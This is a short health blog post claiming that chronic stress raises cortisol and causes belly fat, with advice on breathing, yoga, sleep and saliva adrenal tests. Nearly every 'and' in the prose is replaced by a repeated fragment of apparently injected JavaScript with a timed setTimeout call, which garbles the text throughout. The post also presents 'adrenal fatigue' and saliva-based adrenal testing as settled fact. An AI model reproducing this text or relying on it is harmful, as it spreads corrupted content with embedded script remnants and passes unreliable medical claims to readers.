Can Stress Cause Belly Fat?

Most people are aware that chronic stress lowers the immune system increasing your chance of Cancer, but chronic stress also makes you fat andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and this contributes not only to cancer, but heart disease, diabetes, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and many other conditions.

How does it do this? Stress raises cortisol levels. This raise in cortisol levels is a survival mechanism andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and it raises to protect you during stressful times; however, this cortisol is only supposed to be raised for short period of times andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and then go back to normal. When you stay under chronic stress, your cortisol stays high all the time. This raise in cortisol levels causes weight gain, even if you eat less calories.

Stress in not only in your head, it's in your metabolism. Think about this. Hundreds of years ago, our bodies were trained during challenging times to hold onto fat for survival. If you had to travel hundreds of miles in a stressful storm with little food, your body had the innate ability to hold onto FAT to survive. This same survival mechanism has never left you! Every moment you stay stressed you activate that same mechanism.

Instead of being chased by a bear in a snowstorm, we are faced with non-stop stressfull situations. This non-stop stress raises cortisol andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and then eventually shuts down your adrenals, lowers your immune system, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and makes you fat, even when you change your diet.

Solutions:

Reduce your stress

I know this is easier said than done. If you are feeling stressed a lot, it’s time to find some great tools to destress yourself. Meditation, yoga, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and daily exercise are all great ways to strengthen your parasympathetic nervous system andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and begin to calm your mind.

The other tool I use a lot is breath. Remind yourself throughout the day to just slow down andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and breath. I have taught in my destress your life classes 4-7-8 breathing. Google it. It’s a simple approach to releasing GABA in your brain andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and slowing down your thoughts.

Measure your cortisol levels through cortisol/adrenal saliva testing

If you feel like stress has gotten the best of you andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and your metabolism is now at an all-time low, it may be time to get an adrenal test. There are easy andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and inexpensive saliva tests that we use in my office to check adrenals. Adrenal fatigue can be frustrating. Many people who have adrenal fatigue are exhausted much of the day, hold on to weight, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and are depressed. Once you know your adrenals are depleted, there are easy steps you  take to repair them.

Fix your cortisol levels

There are some simple things you can do to help the cortisol surging through you. The first one is to get your body moving. Whether it’s a daily walk, going to the gym, or hiking in the mountains, the more you move your body the more you will use up that extra cortisol.

The other trick is get a good nights sleep. Our bodies work at their best, when we get 7-9 hours of sleep. Any less than that on a consistent basis, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and your body will not function properly. This includes lowering your immune system andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and your metabolism. Get a good night’s sleep andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and you will be amazed at how well your body functions!
